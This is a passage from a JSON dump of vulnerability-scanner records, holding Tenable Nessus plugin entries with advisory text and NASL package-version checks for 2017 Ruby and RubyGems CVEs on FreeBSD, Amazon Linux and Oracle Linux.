WEBrick outputs the passed user\nname intact to its log, then an attacker can inject malicious escape\nsequences to the log and dangerous control characters may be executed\non a victim's terminal emulator.\n\nThis vulnerability is similar to a vulnerability already fixed, but it\nhad not been fixed in the Basic authentication.\n\nCVE-2017-14033: Buffer underrun vulnerability in OpenSSL ASN1 decode\n\nIf a malicious string is passed to the decode method of OpenSSL::ASN1,\nbuffer underrun may be caused and the Ruby interpreter may crash.\n\nCVE-2017-14064: Heap exposure vulnerability in generating JSON\n\nThe generate method of JSON module optionally accepts an instance of\nJSON::Ext::Generator::State class. If a malicious instance is passed,\nthe result may include contents of heap.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-20T00:00:00", "title": "FreeBSD : ruby -- multiple vulnerabilities (95b01379-9d52-11e7-a25c-471bafc3262f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "modified": "2017-09-20T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ruby", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_95B013799D5211E7A25C471BAFC3262F.NASL", "href": "https://www.tenable.com/plugins/nessus/103345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103345);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n\n script_name(english:\"FreeBSD : ruby -- multiple vulnerabilities (95b01379-9d52-11e7-a25c-471bafc3262f)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"Ruby blog :\n\nCVE-2017-0898: Buffer underrun vulnerability in Kernel.sprintf\n\nIf a malicious format string which contains a precious specifier (*)\nis passed and a huge minus value is also passed to the specifier,\nbuffer underrun may be caused. In such situation, the result may\ncontains heap, or the Ruby interpreter may crash.\n\nCVE-2017-10784: Escape sequence injection vulnerability in the Basic\nauthentication of WEBrick\n\nWhen using the Basic authentication of WEBrick, clients can pass an\narbitrary string as the user name. WEBrick outputs the passed user\nname intact to its log, then an attacker can inject malicious escape\nsequences to the log and dangerous control characters may be executed\non a victim's terminal emulator.\n\nThis vulnerability is similar to a vulnerability already fixed, but it\nhad not been fixed in the Basic authentication.\n\nCVE-2017-14033: Buffer underrun vulnerability in OpenSSL ASN1 decode\n\nIf a malicious string is passed to the decode method of OpenSSL::ASN1,\nbuffer underrun may be caused and the Ruby interpreter may crash.\n\nCVE-2017-14064: Heap exposure vulnerability in generating JSON\n\nThe generate method of JSON module optionally accepts an instance of\nJSON::Ext::Generator::State class. 
If a malicious instance is passed,\nthe result may include contents of heap.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ruby-lang.org/en/security/\"\n );\n # https://www.ruby-lang.org/en/news/2017/09/14/sprintf-buffer-underrun-cve-2017-0898/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0909107e\"\n );\n # https://www.ruby-lang.org/en/news/2017/09/14/webrick-basic-auth-escape-sequence-injection-cve-2017-10784/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90a3a566\"\n );\n # https://www.ruby-lang.org/en/news/2017/09/14/openssl-asn1-buffer-underrun-cve-2017-14033/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5429c6d6\"\n );\n # https://www.ruby-lang.org/en/news/2017/09/14/json-heap-exposure-cve-2017-14064/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5d043841\"\n );\n # https://vuxml.freebsd.org/freebsd/95b01379-9d52-11e7-a25c-471bafc3262f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fcd11fe5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=2.2.0<2.2.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=2.3.0<2.3.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=2.4.0<2.4.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:21:40", "description": "SMTP command injection via CRLF sequences in RCPT TO or MAIL FROM\ncommands in Net::SMTP\n\nA SMTP command injection flaw was found in the way Ruby's Net::SMTP\nmodule handled CRLF sequences in certain SMTP commands. 
An attacker\ncould potentially use this flaw to inject SMTP commands in a SMTP\nsession in order to facilitate phishing attacks or spam campaigns.\n(CVE-2015-9096)\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nThe Basic authentication code in WEBrick library in Ruby allows remote\nattackers to inject terminal emulator escape sequences into its log\nand possibly execute arbitrary commands via a crafted user name.\n(CVE-2017-10784)\n\nBuffer underrun in OpenSSL ASN1 decode\n\nThe decode method in the OpenSSL::ASN1 module in Ruby allows attackers\nto cause a denial of service (interpreter crash) via a crafted string.\n(CVE-2017-14033)\n\nNo size limit in summary length of gem spec\n\nRubyGems is vulnerable to maliciously crafted gem specifications to\ncause a denial of service attack against RubyGems clients who have\nissued a `query` command. (CVE-2017-0900)\n\nArbitrary file overwrite due to incorrect validation of specification\nname\n\nRubyGems fails to validate specification names, allowing a maliciously\ncrafted gem to potentially overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nDNS hijacking vulnerability\n\nRubyGems is vulnerable to a DNS hijacking vulnerability that allows a\nMITM attacker to force the RubyGems client to download and install\ngems from a server that the attacker controls. (CVE-2017-0902)\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nRuby is vulnerable to a malicious format string which contains a\nprecious specifier (*) with a huge minus value. Such situation can\nlead to a buffer overrun, resulting in a heap memory corruption or an\ninformation disclosure from the heap. (CVE-2017-0898)\n\nEscape sequence in the 'summary' field of gemspec\n\nRubyGems is vulnerable to maliciously crafted gem specifications that\ninclude terminal escape characters. Printing the gem specification\nwould execute terminal escape sequences. 
(CVE-2017-0899)\n\nArbitrary heap exposure during a JSON.generate call\n\nRuby can expose arbitrary memory during a JSON.generate call. The\nissue lies in using strdup in ext/json/ext/generator/generator.c,\nwhich will stop after encountering a '\\\\0' byte, returning a pointer\nto a string of length zero, which is not the length stored in\nspace_len. (CVE-2017-14064)\n\nA vulnerability was found where the rubygems module was vulnerable to\nan unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-03T00:00:00", "title": "Amazon Linux AMI : ruby22 / ruby23 (ALAS-2017-906)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2015-9096", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:rubygems22-devel", "p-cpe:/a:amazon:linux:ruby23-debuginfo", "p-cpe:/a:amazon:linux:rubygem22-io-console", "p-cpe:/a:amazon:linux:rubygem22-bigdecimal", "p-cpe:/a:amazon:linux:ruby22", "p-cpe:/a:amazon:linux:ruby22-devel", "p-cpe:/a:amazon:linux:rubygem23-io-console", "p-cpe:/a:amazon:linux:rubygems23-devel", "p-cpe:/a:amazon:linux:rubygem22-psych", "p-cpe:/a:amazon:linux:ruby23-irb", "p-cpe:/a:amazon:linux:ruby22-irb", "p-cpe:/a:amazon:linux:rubygem23-did_you_mean", "p-cpe:/a:amazon:linux:rubygems23", "p-cpe:/a:amazon:linux:rubygems22", "p-cpe:/a:amazon:linux:rubygem23-bigdecimal", "p-cpe:/a:amazon:linux:ruby22-debuginfo", "p-cpe:/a:amazon:linux:ruby22-doc", "p-cpe:/a:amazon:linux:ruby23-devel", "p-cpe:/a:amazon:linux:rubygem23-json", "p-cpe:/a:amazon:linux:ruby23-libs", "p-cpe:/a:amazon:linux:rubygem23-psych", 
"p-cpe:/a:amazon:linux:ruby22-libs", "p-cpe:/a:amazon:linux:ruby23", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:ruby23-doc"], "id": "ALA_ALAS-2017-906.NASL", "href": "https://www.tenable.com/plugins/nessus/103603", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-906.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103603);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/07/10 16:04:12\");\n\n script_cve_id(\"CVE-2015-9096\", \"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"ALAS\", value:\"2017-906\");\n\n script_name(english:\"Amazon Linux AMI : ruby22 / ruby23 (ALAS-2017-906)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SMTP command injection via CRLF sequences in RCPT TO or MAIL FROM\ncommands in Net::SMTP\n\nA SMTP command injection flaw was found in the way Ruby's Net::SMTP\nmodule handled CRLF sequences in certain SMTP commands. 
An attacker\ncould potentially use this flaw to inject SMTP commands in a SMTP\nsession in order to facilitate phishing attacks or spam campaigns.\n(CVE-2015-9096)\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nThe Basic authentication code in WEBrick library in Ruby allows remote\nattackers to inject terminal emulator escape sequences into its log\nand possibly execute arbitrary commands via a crafted user name.\n(CVE-2017-10784)\n\nBuffer underrun in OpenSSL ASN1 decode\n\nThe decode method in the OpenSSL::ASN1 module in Ruby allows attackers\nto cause a denial of service (interpreter crash) via a crafted string.\n(CVE-2017-14033)\n\nNo size limit in summary length of gem spec\n\nRubyGems is vulnerable to maliciously crafted gem specifications to\ncause a denial of service attack against RubyGems clients who have\nissued a `query` command. (CVE-2017-0900)\n\nArbitrary file overwrite due to incorrect validation of specification\nname\n\nRubyGems fails to validate specification names, allowing a maliciously\ncrafted gem to potentially overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nDNS hijacking vulnerability\n\nRubyGems is vulnerable to a DNS hijacking vulnerability that allows a\nMITM attacker to force the RubyGems client to download and install\ngems from a server that the attacker controls. (CVE-2017-0902)\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nRuby is vulnerable to a malicious format string which contains a\nprecious specifier (*) with a huge minus value. Such situation can\nlead to a buffer overrun, resulting in a heap memory corruption or an\ninformation disclosure from the heap. (CVE-2017-0898)\n\nEscape sequence in the 'summary' field of gemspec\n\nRubyGems is vulnerable to maliciously crafted gem specifications that\ninclude terminal escape characters. Printing the gem specification\nwould execute terminal escape sequences. 
(CVE-2017-0899)\n\nArbitrary heap exposure during a JSON.generate call\n\nRuby can expose arbitrary memory during a JSON.generate call. The\nissues lies in using strdup in ext/json/ext/generator/generator.c,\nwhich will stop after encountering a '\\\\0' byte, returning a pointer\nto a string of length zero, which is not the length stored in\nspace_len. (CVE-2017-14064)\n\nA vulnerability was found where the rubygems module was vulnerable to\nan unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-906.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update ruby22' to update your system.\n\nRun 'yum update ruby23' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-libs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby23-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-did_you_mean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem23-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems23\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems23-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/03\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-debuginfo-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-devel-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-doc-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-irb-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-libs-2.2.8-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-debuginfo-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-devel-2.3.5-1.17.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"ruby23-doc-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-irb-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby23-libs-2.3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-bigdecimal-1.2.6-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-io-console-0.4.3-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-psych-2.0.8.1-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-bigdecimal-1.2.8-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-did_you_mean-1.0.0-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-io-console-0.4.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-json-1.8.3.1-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem23-psych-2.1.0.1-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems22-2.4.5.2-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems22-devel-2.4.5.2-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems23-2.5.2.1-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems23-devel-2.5.2.1-1.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby22 / ruby22-debuginfo / ruby22-devel / ruby22-doc / ruby22-irb / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:07:15", "description": "From Red Hat Security Advisory 2018:0378 :\n\nAn update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a 
security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker\ncould exploit this flaw to execute arbitrary commands by setting up a\nmalicious FTP server and tricking a user or Ruby application into\ndownloading files with specially crafted names using the Net::FTP\nmodule. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An\nattacker, with ability to control its format string parameter, could\nsend a specially crafted string that would disclose heap memory or\ncrash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during\ninstallation of a given gem. A specially crafted gem could use this\nflaw to install files outside of the regular directory.\n(CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS\nresponses when requesting the hostname of the rubygems server for a\ndomain, via a _rubygems._tcp DNS SRV query. An attacker with the\nability to manipulate DNS responses could direct the gem command\ntowards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable\nto an unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. 
If\nlogs were printed in a terminal, an attacker could interact with the\nterminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially\ncrafted string to the application in order to crash the ruby\ninterpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize\ngems' specification text. A specially crafted gem could interact with\nthe terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU\nwhile parsing a sufficiently long gem summary. A specially crafted gem\nfrom a gem repository could freeze gem commands attempting to parse\nits summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of\nruby. An attacker with the ability to pass a specially crafted JSON\ninput to the extension could use this flaw to expose the interpreter's\nheap memory. (CVE-2017-14064)\n\n* The 'lazy_initialize' function in lib/resolv.rb did not properly\nprocess certain filenames. A remote attacker could possibly exploit\nthis flaw to inject and execute arbitrary commands. 
(CVE-2017-17790)", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-01T00:00:00", "title": "Oracle Linux 7 : ruby (ELSA-2018-0378)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ruby-doc", "p-cpe:/a:oracle:linux:rubygem-psych", "p-cpe:/a:oracle:linux:rubygem-rdoc", "p-cpe:/a:oracle:linux:ruby-irb", "p-cpe:/a:oracle:linux:rubygem-json", "p-cpe:/a:oracle:linux:rubygem-io-console", "p-cpe:/a:oracle:linux:ruby-devel", "p-cpe:/a:oracle:linux:rubygem-bigdecimal", "p-cpe:/a:oracle:linux:rubygem-rake", "p-cpe:/a:oracle:linux:ruby", "p-cpe:/a:oracle:linux:rubygem-minitest", "p-cpe:/a:oracle:linux:rubygems", "p-cpe:/a:oracle:linux:rubygems-devel", "p-cpe:/a:oracle:linux:ruby-tcltk", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:ruby-libs"], "id": "ORACLELINUX_ELSA-2018-0378.NASL", "href": "https://www.tenable.com/plugins/nessus/107080", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:0378 and \n# Oracle Linux Security Advisory ELSA-2018-0378 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107080);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_xref(name:\"RHSA\", value:\"2018:0378\");\n\n script_name(english:\"Oracle Linux 7 : ruby (ELSA-2018-0378)\");\n script_summary(english:\"Checks rpm output for the updated 
packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:0378 :\n\nAn update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker\ncould exploit this flaw to execute arbitrary commands by setting up a\nmalicious FTP server and tricking a user or Ruby application into\ndownloading files with specially crafted names using the Net::FTP\nmodule. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An\nattacker, with ability to control its format string parameter, could\nsend a specially crafted string that would disclose heap memory or\ncrash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names 